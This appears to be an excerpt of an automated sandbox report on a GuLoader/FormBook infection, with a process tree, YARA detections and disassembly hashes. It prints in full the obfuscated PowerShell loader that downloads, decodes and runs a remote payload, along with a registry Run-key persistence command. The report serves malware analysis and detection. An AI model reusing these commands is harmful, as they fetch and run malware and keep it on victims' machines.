RtAfrC iNenTagUd( B$ HH.yPapE o Gc.eh AoTal,ee BsRet e Tr oi Kn SestmFiiAcaBl)Bl ');Tilfredsstillelse (Viscometres ',i$PrgPal Po vbPeaL.l L:GoxL,yPrl,ooPapCoyOprP.o agStrPrak.p ohU,yBl=si$ oG PhDae ftUttSyoOre.rsHy. .s KuTybInsCatAprDriL.nw gTa(,a$PhCNiaE.lBilFloBrvB,i.aaKonMa,.e$inMKeaTrl MaUncLae.aa eE.)G ');Tilfredsstillelse $xylopyrography;"
                                                            Imagebase:0xa20000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000014.00000002.3003059273.00000000059E7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Has exited:true

                                                            General

                                                            Target ID:21
                                                            Start time:08:01:58
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:22
                                                            Start time:08:01:59
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belinda103.Eft && echo t"
                                                            Imagebase:0x240000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:23
                                                            Start time:08:02:06
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,e4 t ');Tilfredsstillelse (Viscometres ' H$Pag il RoKrbP.aRilVe:InFVuuPosUni Bo Bn,os .a TaRerBeeArn aeU =Am( ,TS.eDusUntE,-ciPUna tMihMa I$VaRBle ahDuaUnrEmd eFenGa)Pr ') ;Tilfredsstillelse (Viscometres ' $ IgArlBlocob Na,ulAr: kutadAgs ,i Ug TeFon UdJee S=F $,og Jl,roR,bEgaTalAf:R APomAlpFaeWirTeeCamNoeU tHirEkeFanNoePi+to+Au%.e$FaL AeGav pe .r e SdSkeTasIm..ucChol uPhn.otLo ') ;$Bageriers=$Leveredes[$udsigende];}$Callovian=319492;$Malaceae=27246;Tilfredsstillelse (Viscometres ' a$Lig.bl OoBab Haunl T:,hXPueEknSto ,pBeh oAmn BtToimacGa2 E4B 9Du Un=M, L.G.reUntTr- CCFuo.rn.utVee nSpt O F$stRHyeMahCia .r,edMaeKknDi ');Tilfredsstillelse (Viscometres ' $AmgTrlG,oOvbNoa,ul A:.eHGry.epIno Cc nh IoTel ,eResTotF,e ArB,i BnD.eLkmApi.ra.s En=Gr ,e[diS .yRes rt MeS.m a. oCT,osonV,vB.eBerG.tBe] s:Re:U,FR,rraoB mAyBSkahos,aeSt6.h4DuSCotI r.riConGrgRe(Sp$ScX AeAbnS,oInpO.h DoavnMetLiiOvcVa2B,4Ra9 ) , ');Tilfredsstillelse (Viscometres ',o$.rgf,l KoDyb,oaPhlT :SaG dhKreHatInt KoAne Ms S ,e=Ge K,[N,S TyIbs,at,fecomIn. eTlae Sx Rt U. SESpnS cAroFod,eiPanN,ggi]Ko:Ud:VeA.nSUnC.nIApI R.CyGPaeBitPoS RtAfrC iNenTagUd( B$ HH.yPapE o Gc.eh AoTal,ee BsRet e Tr oi Kn SestmFiiAcaBl)Bl ');Tilfredsstillelse (Viscometres ',i$PrgPal Po vbPeaL.l L:GoxL,yPrl,ooPapCoyOprP.o agStrPrak.p ohU,yBl=si$ oG PhDae ftUttSyoOre.rsHy. .s KuTybInsCatAprDriL.nw gTa(,a$PhCNiaE.lBilFloBrvB,i.aaKonMa,.e$inMKeaTrl MaUncLae.aa eE.)G ');Tilfredsstillelse $xylopyrography;"
                                                            Imagebase:0xa20000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000017.00000002.2668039251.0000000005634000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000017.00000002.2701170946.00000000085A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000017.00000002.2702490356.000000000A283000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            Has exited:true

                                                            General

                                                            Target ID:24
                                                            Start time:08:02:06
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belinda103.Eft && echo t"
                                                            Imagebase:0x240000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:26
                                                            Start time:08:02:26
                                                            Start date:28/08/2024
                                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                            Imagebase:0xcb0000
                                                            File size:516'608 bytes
                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001A.00000002.2858446917.00000000229A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001A.00000002.2815364367.0000000004843000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001A.00000002.2858446917.00000000233A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001A.00000002.2815202339.0000000003240000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001A.00000002.2815202339.0000000003240000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                            Has exited:true

                                                            General

                                                            Target ID:27
                                                            Start time:08:02:31
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bilateralities" /t REG_EXPAND_SZ /d "%Arrestationernes110% -w 1 $Faucals83=(Get-ItemProperty -Path 'HKCU:\sttyskers\').talevant;%Arrestationernes110% ($Faucals83)"
                                                            Imagebase:0x240000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:28
                                                            Start time:08:02:31
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:29
                                                            Start time:08:02:31
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\SysWOW64\reg.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bilateralities" /t REG_EXPAND_SZ /d "%Arrestationernes110% -w 1 $Faucals83=(Get-ItemProperty -Path 'HKCU:\sttyskers\').talevant;%Arrestationernes110% ($Faucals83)"
                                                            Imagebase:0x9c0000
                                                            File size:59'392 bytes
                                                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:30
                                                            Start time:08:02:46
                                                            Start date:28/08/2024
                                                            Path:C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe"
                                                            Imagebase:0x210000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001E.00000002.4222881972.0000000003F90000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001E.00000002.4222881972.0000000003590000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                            Has exited:false

                                                            General

                                                            Target ID:31
                                                            Start time:08:02:48
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\SysWOW64\srdelayed.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\SysWOW64\srdelayed.exe"
                                                            Imagebase:0x530000
                                                            File size:16'384 bytes
                                                            MD5 hash:B5F31FDCE1BE4171124B9749F9D2C600
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:32
                                                            Start time:08:02:48
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\SysWOW64\relog.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\SysWOW64\relog.exe"
                                                            Imagebase:0xbf0000
                                                            File size:45'568 bytes
                                                            MD5 hash:DA20D543A130003B427AEB18AE2FE094
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000020.00000002.4221469550.0000000003500000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000020.00000002.4221469550.0000000003500000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000020.00000002.4221200788.00000000033B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000020.00000002.4221200788.00000000033B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000020.00000002.4220745067.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000020.00000002.4220745067.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                            Has exited:false

                                                            General

                                                            Target ID:33
                                                            Start time:08:03:01
                                                            Start date:28/08/2024
                                                            Path:C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe"
                                                            Imagebase:0x210000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000021.00000002.4222243357.00000000012D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000021.00000002.4222243357.00000000012D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                            Has exited:false

                                                            General

                                                            Target ID:34
                                                            Start time:08:03:14
                                                            Start date:28/08/2024
                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                            Imagebase:0x7ff6bf500000
                                                            File size:676'768 bytes
                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Executed Functions

                                                              Function 00007FFD9B70B0E6 Relevance: .5, Instructions: 499COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2496951988.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2fced34851b31c3722e6ad33db3c94cff5c77dd720d789e10f6e81351ebc49ea
                                                              • Instruction ID: 868b7ed21d551e636ffba3040f7c7504a7c962642951effee0cf496f328c3444
                                                              • Opcode Fuzzy Hash: 2fced34851b31c3722e6ad33db3c94cff5c77dd720d789e10f6e81351ebc49ea
                                                              • Instruction Fuzzy Hash: 14F1C630A0DA4D8FEBA8DF28C8557E937D1FF54310F44426EE85DC72A5DB34AA458B81
                                                              Function 00007FFD9B70BE92 Relevance: .5, Instructions: 480COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2496951988.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 134240445d804fd646b6240d11eb644663963955be5246133658cd8118978e39
                                                              • Instruction ID: e26a369aac2d01283213b33ed937306d59fa3851f5862c7534b1d3f25b824f94
                                                              • Opcode Fuzzy Hash: 134240445d804fd646b6240d11eb644663963955be5246133658cd8118978e39
                                                              • Instruction Fuzzy Hash: B0F1C430A0DA4D8FEBA8DF28C8657E977D1EF54310F14436ED84DC72A5DE74A9418B82
                                                              Function 00007FFD9B70C71D Relevance: .6, Instructions: 648COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2496951988.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1da2c2f024274c58f85fda8feb93d89783648816282ea01624b857ad534fdcf2
                                                              • Instruction ID: 08060912534e7d08e78f535f9069c4d779fbc4edeedd5bda42eb9b5fa4c80c2e
                                                              • Opcode Fuzzy Hash: 1da2c2f024274c58f85fda8feb93d89783648816282ea01624b857ad534fdcf2
                                                              • Instruction Fuzzy Hash: 54A1657171DB8A4FE759EB2C88A1AB577E1EF95310B0502BFD0C9C71B7DA25A842C341
                                                              Function 00007FFD9B7D49E9 Relevance: .5, Instructions: 475COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2499594076.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd9b7d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dfe4f1a2ab496e64d3a7342919126e0e60520dd416323c43e11e73d859621ef4
                                                              • Instruction ID: 7bf6e6ba43a56268e181830a21f4c4811395612e7eeb71a93db628af21fb0a7e
                                                              • Opcode Fuzzy Hash: dfe4f1a2ab496e64d3a7342919126e0e60520dd416323c43e11e73d859621ef4
                                                              • Instruction Fuzzy Hash: D6E12A32B0FB8E0FEBA5DB5884756A477E1EF95354B0903BED05DC71F2DA18A8098341
                                                              Function 00007FFD9B7D5AED Relevance: .4, Instructions: 381COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2499594076.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd9b7d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 155fb3352036f3b1e897641789a0e184be7d1b3028dfead2f89fee6fb02ab8c6
                                                              • Instruction ID: f248af03799f26ab9557897c79e22793588718398908ffdfe5e21f3217b4e6a9
                                                              • Opcode Fuzzy Hash: 155fb3352036f3b1e897641789a0e184be7d1b3028dfead2f89fee6fb02ab8c6
                                                              • Instruction Fuzzy Hash: 6FB10722B0EB8E0FEBA59B6C48A45B47BD1EF95290B4903BBD05DC71F3ED14AD098341
                                                              Function 00007FFD9B70BAA6 Relevance: .3, Instructions: 334COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2496951988.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e22fa1326bcc6db451a6de6ec2e06ff62be9f214cea50e9f4870185ca8bf5b45
                                                              • Instruction ID: 5754c41286a7a3ecbe9d11029b323696230b4b470279e8bc3454a72ddcdf05ae
                                                              • Opcode Fuzzy Hash: e22fa1326bcc6db451a6de6ec2e06ff62be9f214cea50e9f4870185ca8bf5b45
                                                              • Instruction Fuzzy Hash: E9B1B430609B4D4FEB68DF28C8557E93BE1EF55310F04426EE49DC72A6CE74A9458B82
                                                              Function 00007FFD9B7D4B87 Relevance: .2, Instructions: 156COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2499594076.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd9b7d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 607b5c9f6bbf1ce0a13bcbe1ea09cb3df7c5fec9936ade90f201a8eae4862020
                                                              • Instruction ID: 7d9244838da66232a498304d3aa0bcdbdb0d5c9f40533afa45339da40be92108
                                                              • Opcode Fuzzy Hash: 607b5c9f6bbf1ce0a13bcbe1ea09cb3df7c5fec9936ade90f201a8eae4862020
                                                              • Instruction Fuzzy Hash: A651A322B0FBCA0FE7A59758887567876E1AF95394B9A03BED05DC71F2DD18AC488301
                                                              Function 00007FFD9B7D5C12 Relevance: .1, Instructions: 112COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2499594076.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd9b7d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 08b9be229eb904c14e77a3769578fa6a4cc72b74c8a0e62ca371d1303183a3da
                                                              • Instruction ID: 66161743d83f2341774c1ea1ad4efe84f21cf91ce4bc742e4cd16bd582a6701e
                                                              • Opcode Fuzzy Hash: 08b9be229eb904c14e77a3769578fa6a4cc72b74c8a0e62ca371d1303183a3da
                                                              • Instruction Fuzzy Hash: 13310522F0FB9B0BE7B5969818751B876C1EF90290B8D03BAE45DD71F2ED086D084342
                                                              Function 00007FFD9B70B5A4 Relevance: .1, Instructions: 92COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2496951988.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ad2e2394600be2637a752cd0afdfb6f9a1ecee68706641df4ed3bd38f346619c
                                                              • Instruction ID: 94690addc8558ab847222b3c477a161acefdadabb67a404fcf38c9c96f3af8c8
                                                              • Opcode Fuzzy Hash: ad2e2394600be2637a752cd0afdfb6f9a1ecee68706641df4ed3bd38f346619c
                                                              • Instruction Fuzzy Hash: E831EE30A1A64E8EFBB89F54CC66BF53294FF45319F41023AD44E862B2CA386B45CB51
                                                              Function 00007FFD9B7041E5 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2496951988.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3e6ffc2d01485e3675e6a7ede7ef7c0dc479045d5709cc38633428d358b59bad
                                                              • Instruction ID: 5bcb71ee52f823b82f3ba7486285d421ab14aba17b48ecd7b7618d5a97259e52
                                                              • Opcode Fuzzy Hash: 3e6ffc2d01485e3675e6a7ede7ef7c0dc479045d5709cc38633428d358b59bad
                                                              • Instruction Fuzzy Hash: B101843020CB0C4FD748EF4CE051AA5B3E0FB95324F10056EE58AC36A5D622E882CB41

                                                              Non-executed Functions

                                                              Function 00007FFD9B706E6D Relevance: 1.9, Strings: 1, Instructions: 693COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2496951988.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 1[_H
                                                              • API String ID: 0-1277036976
                                                              • Opcode ID: 477d1c84d53431ad8d66eedaa5dc7980be5089238af9d9dde1dacbceb25c1b5c
                                                              • Instruction ID: 2c7b8ffcdca01fcea9c3615e0d33acefa389b8255dab8f85960d12f9683b2b4d
                                                              • Opcode Fuzzy Hash: 477d1c84d53431ad8d66eedaa5dc7980be5089238af9d9dde1dacbceb25c1b5c
                                                              • Instruction Fuzzy Hash: 4A222672B0EB8E4FEB55DB5CC8B19E97BB0FF55310B0502B7D089C71A2CE24A9428781

                                                              Executed Functions

                                                              Function 0468EF68 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2197253404.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_4680000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \V(k
                                                              • API String ID: 0-1335044990
                                                              • Opcode ID: 5f762f652f32430e8d4ae65a4296e79204f86e55c7aae8ce0cdd9b1142f76e55
                                                              • Instruction ID: d00a51ced0e97591f09043933de6aabe86c332c03ad6f38affe134cee1d73818
